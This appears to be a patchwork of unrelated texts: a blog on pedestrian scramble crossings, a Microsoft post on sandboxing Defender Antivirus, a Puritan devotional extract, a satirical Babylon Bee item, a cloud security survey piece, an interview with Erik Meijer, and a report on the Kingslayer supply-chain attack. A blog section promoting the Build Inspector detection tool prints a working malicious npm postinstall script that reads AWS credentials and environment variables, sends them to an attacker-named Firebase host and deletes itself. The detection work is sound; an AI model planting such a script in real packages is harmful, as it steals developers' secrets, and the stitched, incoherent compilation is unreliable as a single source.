That’s where the pedestrian scramble comes in. In short, it’s a traffic light setup wherein pedestrians get an entire light cycle just for their own crossing purposes. If you’re on foot, you simply get to the intersection, press the Walk button and wait for the current green light cycle for cars to complete. Then all the traffic lights go to red, and the Walk signs in all directions light up. You can cross straight, left, right or even diagonally, without any concern for car traffic. Not only does this make your life safer and less stressful, it also makes things safer and easier for drivers, who don’t have to worry about close calls with people walking as they make their turns. 

I’ve seen pedestrian scrambles implemented very well in two key circumstances: 

1. The Pedestrian-Heavy Area

At intersections with a heavy flow of pedestrian traffic that must unavoidably cross paths with car traffic, pedestrian scrambles are a no-brainer. Most of the intersections around my university campus employ these well. It means that a large amount of people can safely cross on foot, but car traffic also gets a turn to go through.

Without the pedestrian scramble, we would inevitably have lots of perilous close calls between students darting across the street and cars attempting to turn into them—not to mention lots of drivers waiting in uncertainty about when the flow of walkers will stop, then racing to get through the gap.

For both people walking and driving, it’s these moments where someone seizes a break in traffic to dart through that put lives at the greatest risk. I certainly feel my heart race in Cambridge every time I’m trying to make a left turn in a car or cross on foot at an unmarked intersection.  With pedestrian scrambles, though, these hazardous interactions can be completely avoided, decreasing uncertainty and danger.

2. The Stroad

Sometimes, there’s no way to avoid the presence of a busy, fast-moving street in an urban area, especially during rush hour.  For these streets, a pedestrian scramble is immensely helpful.  

On my jogging route, there’s a busy stroad I routinely have to cross, which employs a pedestrian scramble beautifully. Picture four lanes of cars speeding around you at 5pm on a Monday evening.  You feel like an ant amongst these fast-moving vehicles, and the width of the street you want to cross is expansive. 

With a standard pedestrian signal, you end up waiting ages to get the Walk sign to pop up, and the entire time you’re crossing, you have to constantly be on the look out for left- or right-turning vehicles darting through breaks in traffic and nearly running you over. And after all that, if, like me, you’re trying to get to the diagonal corner of the intersection, you have to wait for the next cycle and do it all over again.

Scramble in Cambridge, MA (Photo by Rachel Quednau)

With the pedestrian scramble, however, I simply push the Walk button, wait for the existing light to go red, and then enjoy a safe stroll directly to the corner I wish to go to while all the cars are stopped around me. There’s no need to look anxiously about for a surprise left-turner or worry that someone might suddenly veer into the crosswalk. The sense of safety you feel while crossing with all the cars stopped is incredible.

And it’s so easy to achieve! You could implement pedestrian scrambles at significant intersections in your city next week at no extra cost. All it requires is the reprogramming of the light cycle.  It can take a little while for pedestrians to get used to these lights and recognize their newfound freedom, but unlike other traffic additions like roundabouts and bike lanes, this switch is unlikely to cause much confusion or misuse.  

Because they have not been implemented on a large scale nationwide, there isn’t an overwhelming amount of data on pedestrians scrambles, but what does exist shows a serious decrease in collisions and dangerous close calls after pedestrian scrambles are implemented in areas with high volumes of people on foot.

If you’ve been reading Strong Towns for any length of time, it may not surprise you to learn that plenty of traffic engineers are against pedestrian scrambles due to their potential for slightly decreasing auto “efficiency” and perhaps adding a few extra seconds to car trips through busy areas. If only these same engineers cared about pedestrian efficiency, though (let alone safety). For me and my fellow walkers, it’s far more efficient to be able to safely cross to the diagonal corner of a street in a matter of seconds, protected by a light, than to fearfully wait for a break in traffic to dart across.  It also seems more efficient for cars to then travel through the intersection on a green light without needing to worry about interactions with pedestrians during their trip.

The bottom line? In busy areas where people and cars intersect, pedestrian scrambles just make sense.

(Cover photo: Pedestrian scramble in Toronto. Source: City Clock Magazine via Flickr. Creative Commons license.)

---

---

Windows Defender Antivirus has hit a new milestone: the built-in antivirus capabilities on Windows can now run within a sandbox. With this new development, Windows Defender Antivirus becomes the first complete antivirus solution to have this capability and continues to lead the industry in raising the bar for security.

Putting Windows Defender Antivirus in a restrictive process execution environment is a direct result of feedback that we received from the security industry and the research community. It was a complex undertaking: we had to carefully study the implications of such an enhancement on performance and functionality. More importantly, we had to identify high-risk areas and make sure that sandboxing did not adversely affect the level of security we have been providing.

While it was a tall order, we knew it was the right investment and the next step in our innovation journey. It is available to Windows Insiders today. We encourage researchers and partners to try and examine this feature and give us feedback, so we can fine-tune performance, functionality, and security before we make it broadly available.

Why sandbox? Why now?

From the beginning, we designed and built Windows Defender Antivirus to be resistant to attacks. In order to inspect the whole system for malicious content and artifacts, it runs with high privileges. This makes it a candidate for attacks.

Security researchers both inside and outside of Microsofthave previously identified ways that an attacker can take advantage of vulnerabilities in Windows Defender Antiviruss content parsers that could enable arbitrary code execution. While we havent seen attacks in-the-wild actively targeting Windows Defender Antivirus, we take these reports seriously. We immediately fixed potential problems and ramped up our own research and testing to uncover and resolve other possible issues.

At the same time, we continued hardening Windows 10 in general against attacks. Hardware-based isolation, network protection, controlled folder access, exploit protection, and other technologies reduce the attack surface and increase attacker costs. Notably, escalation of privilege from a sandbox is so much more difficult on the latest versions of Windows 10. Furthermore, the integration of Windows Defender Antivirus and other Windows security technologies into Windows Defender ATPs unified endpoint security platform allows signal-sharing and orchestration of threat detection and remediation across components.

Running Windows Defender Antivirus in a sandbox ensures that in the unlikely event of a compromise, malicious actions are limited to the isolated environment, protecting the rest of the system from harm. This is part of Microsofts continued investment to stay ahead of attackers through security innovations. Windows Defender Antivirus and the rest of the Windows Defender ATP stack now integrate with other security components of Microsoft 365 to form Microsoft Threat Protection. Its more important than ever to elevate security across the board, so this new enhancement in Windows Defender Antivirus couldnt come at a better time.

Implementing a sandbox for Windows Defender Antivirus

Modern antimalware products are required to inspect many inputs, for example, files on disk, streams of data in memory, and behavioral events in real time. Many of these capabilities require full access to the resources in question. The first major sandboxing effort was related to layering Windows Defender Antiviruss inspection capabilities into the components that absolutely must run with full privileges and the components that can be sandboxed. The goal for the sandboxed components was to ensure that they encompassed the highest risk functionality like scanning untrusted input, expanding containers, and so on. At the same time, we had to minimize the number of interactions between the two layers in order to avoid a substantial performance cost.

The ability to gradually deploy this feature was another important design goal. Because we would be enabling this on a wide range of hardware and software configurations, we aimed to have the ability at runtime to decide if and when the sandboxing is enabled. This means that the entire content scanning logic can work both in-proc and out-of-proc, and it cant make any assumptions about running with high privileges.

Performance is often the main concern raised around sandboxing, especially given that antimalware products are in many critical paths like synchronously inspecting file operations and processing and aggregating or matching large numbers of runtime events. To ensure that performance doesnt degrade, we had to minimize the number of interactions between the sandbox and the privileged process, and at the same time, only perform these interactions in key moments where their cost would not be significant, for example, when IO is being performed.

Windows Defender Antivirus makes an orchestrated effort to avoid unnecessary IO, for example, minimizing the amount of data read for every inspected file is paramount in maintaining good performance, especially on older hardware (rotational disk, remote resources). Thus, it was crucial to maintain a model where the sandbox can request data for inspection as needed, instead of passing the entire content. An important note: passing handles to the sandbox (to avoid the cost of passing the actual content) isnt an option because there are many scenarios, such as real-time inspection, AMSI, etc., where theres no sharable handle that can be used by the sandbox without granting significant privileges, which decreases the security.

Resource usage is also another problem that required significant investments: both the privileged process and the sandbox process needed to have access to signatures and other detection and remediation metadata. To avoid duplication and preserve strong security guarantees, i.e., avoid unsafe ways to share state or introducing significant runtime cost of passing data/content between the processes, we used a model where most protection data is hosted in memory-mapped files that are read-only at runtime. This means protection data can be hosted into multiple processes without any overhead.

Another significant concern around sandboxing is related to the inter-process communication mechanism to avoid potential problems like deadlocks and priority inversions. The communication should not introduce any potential bottlenecks, either by throttling the caller or by limiting the number of concurrent requests that can be processed. Moreover, the sandbox process shouldn’t trigger inspection operations by itself. All inspections should happen without triggering additional scans. This requires fully controlling the capabilities of the sandbox and ensuring that no unexpected operations can be triggered. Low-privilege AppContainers are the perfect way to implement strong guarantees because the capabilities-based model will allow fine-grained control on specifying what the sandbox process can do.

Lastly, a significant challenge from the security perspective is related to content remediation or disinfection. Given the sensitive nature of the action (it attempts to restore a binary to the original pre-infection content), we needed to ensure this happens with high privileges in order to mitigate cases in which the content process (sandbox) could be compromised and disinfection could be used to modify the detected binary in unexpected ways.

Once the sandboxing is enabled, customers will see a content process MsMpEngCP.exe running alongside with the antimalware service MsMpEng.exe.

The content processes, which run with low privileges, also aggressively leverage all available mitigation policies to reduce the attack surface. They enable and prevent runtime changes for modern exploit mitigation techniques such as Data Execution Prevention (DEP), Address space layout randomization (ASLR), and Control Flow Guard (CFG). They also disable Win32K system calls and all extensibility points, as well as enforce that only signed and trusted code is loaded. More mitigation policies will be introduced in the future, alongside other techniques that aim to reduce even further the risk of compromise, such as multiple sandbox processes with random assignment, more aggressive recycling of sandbox processes without a predictable schedule, runtime analysis of the sandbox behavior, and others.

How to enable sandboxing for Windows Defender Antivirus today

We’re in the process of gradually enabling this capability for Windows insiders and continuously analyzing feedback to refine the implementation.

Users can also force the sandboxing implementation to be enabled by setting a machine-wide environment variable (setx /M MP_FORCE_USE_SANDBOX 1) and restarting the machine. This is currently supported on Windows 10, version 1703 or later.

Looking ahead: Broader availability and continuous innovation

To implement sandboxing for Windows Defender Antivirus, we took a lot of inputs from the feedback, suggestions, and research from our peers in the industry. From the beginning, we saw this undertaking as the security industry and the research community coming together to elevate security. We now call on researchers to follow through, as we did, and give us feedback on the implementation.

Windows Defender Antivirus is on a path of continuous innovation. Our next-gen antivirus solution, which is powered by artificial intelligence and machine learning and delivered in real-time via the cloud, is affirmed by independent testers, adoption in the enterprise, and customers protected every day from malware campaigns big and small. Were excited to roll out this latest enhancement to the rest of our customers.

And we are committed to continue innovating. Were already working on new anti-tampering defenses for Windows Defender Antivirus. This will further harden our antivirus solution against adversaries. Youll hear about these new efforts soon. Windows Defender Antivirus and the rest of the Windows Defender Advanced Threat Protection will continue to advance and keep on leading the industry in raising the bar for security.

 

 

Mady Marinescu
Windows Defender Engineering team
with Eric Avena
Content Experience team

 

 

---

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Windows Defender Antivirus can now run in a sandbox appeared first on Microsoft Secure.

[From The Rare Jewel of Christian Contentment by Jeremiah Burroughs (1600-1646). Justin Perry of Covenant Life Church in Tampa quoted the third consideration in his talk this week at the Treasuring Christ Together Network’s pastors and wives retreat.]

CONSIDERATIONS TO CONTENT THE HEART IN ANY AFFLICTED CONDITION.

1) We should consider, in all our wants and inclinations to discontent, the greatness of the mercies that we have, and the meanness of the things we lack. The things we lack, if we are godly, are things of very small moment in comparison to the things we have, and the things we have are things of very great moment. … I will give you the example of a couple of godly men, meeting together, Anthony and Didymus: Didymus was blind, and yet a man of very excellent gifts and graces: Anthony asked him if he was not troubled at his want of sight. He confessed he was, ‘But’, he said, ‘should you be troubled at the want of what flies and dogs have, and not rather rejoice and be thankful that you have what angels have?’ God has given you those good things that make angels glorious; is not that enough for you, though you lack what a fly has? And so a Christian should reason the case with himself: what am I discontented for? I am discontented for want of what a dog may have, what a devil may have, what a reprobate may have; shall I be discontented for not having that, when God has given me what makes angels glorious? ‘Blessed be God,’ says the Apostle in Ephesians 1:3, ‘who hath blessed us with all spiritual blessings in heavenly places.’ It may be you have not such great blessings in earthly places as some others have, but if the Lord has blessed you in heavenly places, that should content you. There are blessings in heaven, and he has set you here for the present, as it were in heaven, in a heavenly place. The consideration of the greatness of the mercies that we have, and the littleness of the things that God has denied us, is a very powerful consideration to work this grace of contentment. …

3) The consideration of the abundance of mercies that God bestows and we enjoy. It is a saying of Luther: ‘The sea of God’s mercies should swallow up all our particular afflictions.’ Name any affliction that is upon you: there is a sea of mercy to swallow it up. If you pour a pailful of water on the floor of your house, it makes a great show, but if you throw it into the sea, there is no sign of it. So, afflictions considered in themselves, we think are very great, but let them be considered with the sea of God’s mercies we enjoy, and then they are not so much, they are nothing in comparison. …

8) Before your conversion, before God wrought upon your souls, you were contented with the world without grace, though you had no interest in God nor Christ; why cannot you now be contented with grace and spiritual things without the world? If you yourselves were content with the world without grace, there is reason you should be content with grace without the world. Certainly there is infinitely more reason. You see that many men of the world have a kind of contentment; they do not murmur or repine with the world, though they have no interest in God and Christ. Then cannot you have as much contentment with God and Christ, without the world, as they can, with the world, without God and Christ? It is an infinite shame that this should be so.

9) Yea, consider, when God has given you such contentments you have not given him the glory. When God has let you have your heart’s desire, what have you done with your heart’s desire? You have not been any the better for it; it may be you have been worse many times. Therefore let that satisfy you-I meet with crosses, but when I had contentment and all things coming in, God got but little or no glory from me, and therefore let that be a means now to quiet me in my discontented thoughts.

10) Finally, consider all the experience that you have had of God’s doing good to you in the want of many comforts. When God crosses you, have you never had experience of abundance of good in afflictions? It is true, when ministers only tell men that God will work good out of their afflictions, they hear them speak, and think they speak like good men, but they feel little or no good; they feel nothing but pain. But when we cannot only say to you that God has said he will work good out of your afflictions, but we can say to you, that you yourselves have found it so by experience, that God has made former afflictions to be great benefits to you, and that you would not have been without them, or without the good that came by them for a world, such experiences will exceedingly quiet the heart and bring it to contentment. Therefore think thus with yourself: Lord, why may not this affliction work as great a good upon me as afflictions have done before?

Ireland’s internet privacy regulator has opened an investigation into the massive data breach Facebook announced last week affecting at least 50 million users.The Data Protection Commission on Wednesday announced that it would probe whether Facebook...

We gave a talk on detecting malicious builds with Build Inspector, Do you trust your builds, or build what you trust?, at Null Singapore a week ago. In this blog post, we provide a summary of the talk which involves describing the dangers of trusting Open-Source and the steps you can take to detect these threats.

Pretext

The rapid increase of Open-Source Library Growth is seen in the past few years as Software Developers assemble applications with Open-Source components and libraries distributed through package managers such as npm. As a result, a large amount of code can be left unaudited as they originate from third party vendors.

The code cocktail above illustrates the utility of Open-Source code in recent projects. Developers often overlook the additional set of transitive Open-Source libraries pulled in by the Open-Source libraries which they have specified as the set of dependencies required for their projects.

Prevalence of malicious packages

Due to the amount of Open-Source code pulled in a typical project, it is easy to go unnoticed if a malicious package was sneaked into the dependency tree. Additionally, the ease of publishing packages in central repositories not only encourages great software practices such as code reuse, creating the perfect source for distributing malicious code. Most recently, 37 typo-squatted packages were published and subsequently yanked from npm. On top of the usual functionalities which the packages were intended to provide, these typo-squatted packages include a malicious post-install script which attempts to steal valuable environment variables such as extracting the client secret and keys to external services.

package.json

{
  "name": "a-legit-package",
  "version": "0.2.0",
  "description": "This package runs a script after installation",
  "main": "app.js",
  "scripts": {
    "postinstall": "sh build.sh"
  },
  ...
}

build.sh

OS=`uname -s`
if [ "$OS" = "Linux" ]
then
    gcc helloworld.c
    ./a.out
    node install.js
else
    node install.js
fi

install.js

var fs = require('fs');
var Firebase = require("firebase");
var ref = new Firebase("https://malicious-user-db.firebaseio.com/");
var dbRef = ref.child("env_vars");


var filepath = process.env.HOME+'/.aws/credentials';
var data = fs.readFileSync(filepath,'utf8');
dbRef.push({status : "leaked sensitive files", message : process.env}, clean());


function clean(){
  try{
    fs.unlinkSync("install.js");
  }
  catch (ex){}
  process.exit(0);
}

To illustrate the simplicity of generating malicious packages, a-legit-package can include a post-install script, sh build.sh, which eventually executes node install.js when building. If all pre-conditions are met, the AWS environment variables would definitely be leaked to the author of the package. To aid in discovering malicious activities like these, we built a tool, Build Inspector, that enables visibility on the builds.

Build inspector

Build Inspector is an open-source forensic sandbox that can be used to monitor various changes such as processes, file changes, as well as network activity. Of its many use cases, Build Inspector was extended to detect insecure network activities, and was used to find a large amount of builds which made insecure network connections.

In the following example, we include a post-install script, described in the previous section, in our package.json

test-repos/npmmalware/package.json
...
  "scripts": {
    "postinstall": "sh build.sh"
  },
...

We run then Build Inspector on this repository, specifying that it is an npm build.

./inspector --npm test-repos/npmmalware
****************************** [:] ******************************
* Build Inspector - SRC:CLR - https://www.sourceclear.com/      *
* Security for open-source code.                   *
****************************** [:] ******************************

==> inspector: Bringing machine 'default' up with 'virtualbox' provider...
...
...
...
Starting build ...
==> inspector: fatal: Not a git repository (or any of the parent directories): .git
==> inspector:
==> inspector: > a-legit-package@0.2.0 postinstall /home/vagrant/repo
==> inspector: > sh build.sh
==> inspector:
==> inspector: Hello, World!Done. Your build exited with 0.
Stopping network monitoring ...
Generating file system changes ...
Collecting evidence ...
...
Filtered commands executed:
  ...
  [uid:1000 sid:1949 tty:(none) cwd:/home/vagrant/repo filename:/usr/bin/npm]: npm install
  [uid:1000 sid:1949 tty:(none) cwd:/home/vagrant/repo filename:/bin/sh]: sh build.sh
  [uid:1000 sid:1949 tty:(none) cwd:/home/vagrant/repo filename:/usr/bin/gcc]: gcc helloworld.c
  ...
  [uid:1000 sid:1949 tty:(none) cwd:/home/vagrant/repo filename:./a.out]: ./a.out
  [uid:1000 sid:1949 tty:(none) cwd:/home/vagrant/repo filename:/usr/bin/node]: node install.js
  ...
Hosts contacted:
  malicious-user-db.firebaseio.com (35.201.97.85)                1.1K
[:] Build inspector finished after 93.569969 seconds

A sample run of Build Inspector on a local project is illustrated above. We can immediately notice some details that stand out from the output such as the list of external hosts contacted, and the commands executed.

The complete report of the build will include details of file changes, DNS activities, insecure network activities, processes that were left running after the build, and the commands that were executed in the build process. With the visibility provided by these details, we can make a better assessment of whether a build is malicious.

Using & Contributing to Build Inspector

Build Inspector is released under the Apache License. In hopes of enhancing the outreach and capabilities of Build Inspector, we would welcome any Pull Requests (PR) that improves security or ensure broader support for Continuous Integration (CI) systems.

Alright, brave soldiers of the Resistance, buckle up. This one’s so repulsive it needs a trigger warning: news just broke that President Trump had so much hate for Muslims, he actually went back in time and forced President Obama to choose the countries Trump was able to target with his travel ban after taking office. […]

The post DISGUSTING: Fueled By His Hate For Muslims, Trump Went Back In Time And Made Obama Pick The Countries Targeted By His Travel Ban appeared first on The Babylon Bee.

Cloud security, in theory, should be improving as organizations gain more experience. But a new survey of IT security professionals published by Crowd Research Partners in collaboration with LinkedIn suggests quite the opposite. As more workloads move into the cloud it would appear IT security professionals are just now starting to appreciate just how much different cloud security really is compared to managing security in an on-premises environment.

The survey finds misconfiguration of cloud platforms jumped to the number one spot in this year’s survey as the single biggest threat to cloud security (62%); followed by unauthorized access through misuse of employee credentials and improper access controls (55%), and insecure interfaces / APIs (50%).

Given some recent high-profile breaches where the root cause of the problem has been the configuration that’s not all that surprising. But because of those human errors, the survey notes more cybersecurity professionals are concerned about cybersecurity than ever. Nine out of ten cybersecurity professionals confirm they are concerned about cloud security, an increase of 11 percentage points from last year’s cloud security survey.

The top three security control challenges identified were visibility into infrastructure security (43%), compliance (38%), and setting consistent security policies across cloud and on-premises environments (35%).

The top three cloud security challenges cited by cybersecurity professionals included protecting against data loss and leakage (67%), threats to data privacy (61%), and breaches of confidentiality (53%).

What the survey makes clear is that many cybersecurity professionals are starting to appreciate is that lifting and shifting existing cybersecurity controls and processes into the cloud doesn’t work. Only 16 percent of organizations report that the capabilities of traditional security tools are sufficient to manage security across the cloud, a 6-percentage point drop from our previous survey. A full 84 percent say traditional security solutions either don’t work at all in cloud environments or have only limited functionality. And yet, while half of the respondents said they use their cloud provider’s security tools, only 35 percent said deploy third-party security software to ensure the proper cloud security controls are implemented.

'43% of cybersecurity professionals are struggling with visibility into cloud infrastructure security.' ~ @mvizardClick To Tweet

Specifically, the report finds cybersecurity professionals are struggling with visibility into cloud infrastructure security (43%), compliance (38%), and setting consistent security policies across cloud and on-premises environments (35%).

The good news is half of the organizations said they expect cloud security budgets to increase and that encryption of data at rest (64%) and data in motion (54%) tops the list of the most effective cloud security technologies; followed by security information and event management (SIEM) platforms (52%).

However, the biggest challenge cybersecurity professionals may be facing isn’t the technology. The processes used to deploy workloads in the cloud are substantially different than in a traditional on-premises environment. Developers make extensive use of APIs to programmatically provision infrastructure and applications using modern DevOps processes. If cybersecurity professionals want to be relevant to those developers there needs to be a way for developers to programmatically provision cybersecurity controls, a process increasingly known as DevSecOps. That’s not easy for many cybersecurity professionals because it means giving up reliance of traditional graphical and command line interfaces.

Most cybersecurity professionals don’t have much in the way of programming skills, so the challenge becomes finding a way to insert themselves into the front end of the application development process. From there they should be able to provide developers with some much-needed cybersecurity guidance. On the plus side, more developers are starting to appreciate that advice, as long as it’s delivered in a way that allows them to act on it by invoking a simple API versus asking them to learn a GUI they have no desire to learn, much less master.

This article originally appeared on Bitcoin Magazine.

Note: This post originally appeared in the ACM Queue publication for my regular column. 

There are smart people in the world. And then there are *really* smart people. You know the ones I am talking about – the ones that are so impressive that it doesn’t matter what they do (academia, programming, engineering, or management) that you know if they are doing it, then they are doing it well.

And so for this issue of my column I wanted to share with you some of my favorite engineering and leadership lessons from one of the smartest people I know – Erik Meijer.

Whether you are a leader, a programmer, or just someone aspiring to be better I am sure there are some smart takeaways from our conversation that will help you grow in your role Oh, and if you read to the end you can learn his favorite interview question – see if you would be able to pass his interview.

What are the qualities that make someone an amazing engineer?

There is a paper called The Humble Programmer, and even though it was written in 1972 after all these years it is still super relevant. In the early days, programming was about puzzle solving or optimizing the computational process – those ideas are still there. Our world is very complicated, we are dealing with distributed systems, all kinds of models, neural nets, frameworks, new languages. And we don’t have the mental power to keep on top of every new innovation and idea. Mental power is our most precious resource.

Great engineers are the ones that are able to maximize their mental power.

Part of this is being able to leverage the power of abstraction. Focusing on what is important, and leaving out the unnecessary details. Sometimes details are important, other times they are not. We cannot talk about everything in absolute terms. Developers need to recognize these levels of abstractions.

A good engineer knows how to handle leaky abstractions and can go up a level or dive deeper down when needed. But that same engineer also has to accept that you can never understand everything.

We need to be asking how we can design systems so that computers can handle more of the work for us? A lot of developers are still creating programs as text. A lot of the tools we use to manipulate programs are still too primitive. We need to be much more mindful of how we can use computers to do our jobs.

The whole point of The Humble Programmer is that your brain power is your most limited resource so using smart tools is a good thing. A good developer understands that they can’t do everything, and knows how to leverage all the other tools.

Kate’s Takeaways: You should read (or re-read) the Humble Programmer. And always be on the lookout for ways to work smarter – better tools, intelligent systems, and enlisting help – focus your mental energy on the task with the most dividends.

What are the qualities that make someone an amazing engineering manager?

One of the first things is you have to have deep technical knowledge. But it also important to know possess self awareness, empathy, and emotional intelligence. You have to be able to understand other people and you have to be able to steer people and move people.

In management, there is a communication feedback loop. In one direction, a manager interacting with their reports requires emotional intelligence. He or she has to know what drives the other person to get optimal results. A great manager will help people do their best work.

The second part of the loop is the reports back to their manager, and the skill that matters here is empathy. You have to understand what they are trying to say. These are noisy channels. You might hear something but that isn’t what was said, and vice versa.

Each direction of the loop has uncertainty.

It is your job as the manager to make sure this communication is correct. It is on you to make sure that the feedback loop works. This creates a virtuous cycle – the better you understand your reports the more empathy and emotional intelligence you have in that relationship.

There can be problems, though. By taking a bayesian approach, you need to do error correction. One of the ways you get that error correction is through peer feedback and 360 reviews.

In your mind you create a model of someone. When something happens, you hear something or observe something then you are updating that mental model. This is where biases can be dangerous. In the beginning you don’t know anything about someone, but the more interactions you have over time the uncertainty in your model diminishes.

Kate’s Takeaway: Feedback loops are an interesting way to think about you interactions and relationships. If you want another lens on a similar topic Eric wrote this paper on the Responsive Enterprise that talks about these loops in an organizational context.

What book do you wish all software engineers would read and why?

How to Win Friends and Influence People.

That book gives you really complete ways to think about human relationships and how you interact with other people. It is written in a way that makes you consider the lessons by putting yourself in the other person’s shoes. How do they think or feel in these situations? And what can you do differently?

I make a copy of the book cliff notes and glue it onto the cover of my notebooks. Every two weeks I read the rules and refresh myself into doing the right thing.

The books I recommend for managers are ones by Jeffrey Pfeffer and Robert Sutton (professors at Stanford) since they are more evidence driven. A lot of books are more things people believe but there is no proof, you can’t always reproduce the results, so their books are better.no

Kate’s Takeaway: Whether it is “How to Win..” or a another book, figure out your own rules and revisit them regularly. Without some sort of external stimulus most of us will fall back into our default modes of socially awkward introvert, and so a paper taped to the inside of your planner or notebooks is a smart idea.

What is the the best piece of career advice you have ever received?

When I did my PhD, afterward in the celebration my advisor, Kees Koster, said to be at the intersection of theory and practice.

It is easy to dive into theory, or all the way into just practice – but the real interesting work happens between theory and practice. Try to understand both sides. The safe spot is in those extreme. Just theory is not enough and just practice is not enough.

Now there are a so many online courses, so many blogs, and lots of white papers. You can subscribe to The Morning Paper, go through the ACM Digital archives – a lot of people are making it easier to bridge gaps. Going back to the Humble Programmer, you can’t keep up with all of the knowledge that is produced. You don’t have to throw your hands in the air and say it is too much – you have to know how to spend your energy and brainpower.

Kate’s Takeaway: It is never enough to just do what is obvious. You have to dig deep. Devote time in your schedule to learn new things. Try to read a white paper per week, or per month.

What is your team process?

How does work get done? How do you communicate status?

A lot of things you read about process has very little evidence behind it. I don’t believe a lot process is scientific. Instead, I define guidelines and within those I don’t care how things happen.

My thinking has two main sources of inspiration: military and the Hacker Way.

Over time armies have figured out how to get things done and achieve their goals in an environment that is really chaotic and completely unpredictable. If you read the Marines Warfighting manual, and replace the word “war” with “software” – everything in there holds true.

So how do you deal with uncertainty?

What people do with processes is that they are trying to fight or control uncertainty. For example, someone can say just adopt zero inbox and your life will be awesome. In reality though, that isn’t really the case.

One of the things I like about Facebook is the Hacker Way. It is approach to building that involves continuous improvement and feedback. It is about computational thinking: how do you program the system, and how do you make the system do things that no one thought was possible?

Being agile is about communication. The process needs to change with the situation. You have to have a big picture of where you want to go, but any plan or process will shatter immediately when you hit your first bug, or something happens out of control.

In most projects there are two phases: an explorative phase and an execution phase. Your project should progress like a damped sine wave (where the amplitude gets smaller over time). You have to figure out what to build, and figure out what is the question we are trying to answer. In the beginning you want to increase the vertical velocity to get uncertainty under control, and then you want horizontal velocity to increase when you get into execution.

With prescriptive process, people are looking for a silver bullet to solve problems, but it doesn’t exist. It comes back again to the humble programmer; the world is super confusing and you have to embrace it and work with it.

Kate’s Takeaway: You have to make your process work for you. Imagine your projects progressing on a damped sine wave – first focus on finding the right questions, and then the answers.

Who is the best manager you ever worked for? What made them so great?

William Adams. He was my manager at Microsoft. He is an inspiration, and I am still trying to emulate him in my work.

There are several things I liked about him – one is the importance he sees in diversity. For example, feedback loops and prior assumptions – you need diversity to challenge your thinking. You have to actively put energy into creating a diverse environment so you are always challenging the status quo. Don’t get stuck in a local optimum.

The other thing is that he always focused on was people first. You want to create the circumstances where everyone can focus on their strengths. Always find the best job for the person. Try to get a sense of the progress and circumstances so you can get ahead of what is next. For example, if the project is winding down, make sure there is always a pipeline of new ideas. You have to make sure the pipelines are set up so they never stall – keeping things innovative.

Kate’s Takeaway: Think about the people around you. Do you have enough different opinions to keep your team out of a local optimum? How can you get more diversity?

What are the common mistakes that even good engineering managers sometimes make?

Your prior assumptions are not higher order – your assumptions about assumptions. I keep reading “How to Win Friends…” because I understand it is easy to fall back into my default behavior. That is the big thing, your work is never done – you never know and you aren’t perfect – there is always stuff to learn. You have to keep up with your trade and keep learning.

You have to keep pushing yourself to get better.

Once you get stuck and stop pushing yourself it is a big mistake.

Kate’s Takeaway: Think about some of the past lessons you’ve learned. What could you use a refresh on? What are some of the new things you want to learn?

What is your best interview question?

Given a type with 2 parameters r, a.

(a -> r) -> r

Prove this type forms a monad.

If you try to solve this question by brute force you are going to fail.

Thinking about thinking – you have to think about this abstractly. If you look at it from the right level of abstraction, it is easy. Ssounds really theoretical, but it is super practical. When you are using JavaScript you are using this function. It is a micro example of everything above into one single type.

———

Being a great developer is hard – it requires constant learning and a passion for technology and science. The same thing is true for great technical leaders. There are a lot of smart lessons but perhaps the most important one is to always be pushing yourself, and to be smart about your brain power and energy (working smart).

Hopefully you enjoyed this interview and learned a few things that you can incorporate into your work and life.  See you next time!

-Kate

Amid the hustle and bustle of the RSA Security Conference in San Francisco last week, researchers at RSA released a startling report that received very little press coverage relative to its overall importance. The report detailed a malware campaign that piggybacked on a popular piece of software used by system administrators at some of the nation’s largest companies. Incredibly, the report did not name the affected software, and the vendor in question has apparently chosen to bury its breach disclosure. This post is an attempt to remedy that.

The RSA report detailed the threat from a malware operation the company dubbed “Kingslayer.” According to RSA, the attackers compromised the Web site of a company that sells software to help Windows system administrators better parse and understand Windows event logs. RSA said the site hosting the event log management software was only compromised for two weeks — from April 9, 2015 to April 25, 2015 — but that the intrusion was likely far more severe than the short duration of the intrusion suggests.

That’s because in addition to compromising the download page for this software package, the attackers also hacked the company’s software update server, meaning any company that already had the software installed prior to the site compromise would likely have automatically downloaded the compromised version when the software regularly checked for available updates (as it was designed to do).

RSA said that in April 2016 it “sinkholed” or took control over the Web site that the malware used as a control server — oraclesoft[dot]net — and from there they were able to see indicators of which organizations might still be running the backdoored software. According to RSA, the victims included five major defense contractors; four major telecommunications providers; 10+ western military organizations; more than two dozen Fortune 500 companies; 24 banks and financial institutions; and at least 45 higher educational institutions.

RSA declined to name the software vendor whose site was compromised, but said the company issued a security notification on its Web site on June 30, 2016 and updated the notice on July 17, 2016 at RSA’s request following findings from further investigation into a defense contractor’s network. RSA also noted that the victim software firm had a domain name ending in “.net,” and that the product in question was installed as a Windows installer package file (.msi).

Using that information, it wasn’t super difficult to find the product in question. An Internet search for the terms “event log security notification april 2015” turns up a breach notification from June 30, 2016 about a software package called EVlog, produced by an Altair Technologies Ltd. in Mississauga, Ontario. The timeline mentioned in the breach notification exactly matches the timeline laid out in the RSA report.

As far as breach disclosures go, this one is about the lamest I’ve ever seen given the sheer number of companies that Altair Technologies lists on its site as subscribers to eventid.net, an online service tied to EVlog. I could not locate a single link to this advisory anywhere on the company’s site, nor could I find evidence that Altair Technologies had made any effort via social media or elsewhere to call attention to the security advisory; it is simply buried in the site. A screenshot of the original, much shorter, version of that notice is here.

Perhaps the company emailed its subscribers about the breach, but that seems doubtful. The owner of Altair Technologies, a programmer named Adrian Grigorof, did not respond to multiple requests for comment.

“This attack is unique in that it appears to have specifically targeted Windows system administrators of large and, perhaps, sensitive organizations,” RSA said in its report. “These organizations appeared on a list of customers still displayed on the formerly subverted software vendor’s Web site. This is likely not coincidence, but unfortunately, nearly two years after the Kingslayer campaign was initiated, we still do not know how many of the customers listed on the website may have been breached, or possibly are still compromised by the Kingslayer perpetrators.”

It’s perhaps worth noting that this isn’t the only software package sold by Altair Technologies. An analysis of Eventid.net shows that the site is hosted on a server along with three other domains, eventreader.com, firegen.com and grigorof.com (the latter being a vanity domain of the software developer). The other two domains — eventreader.com and firegen.com — correspond to different software products sold by Altair.

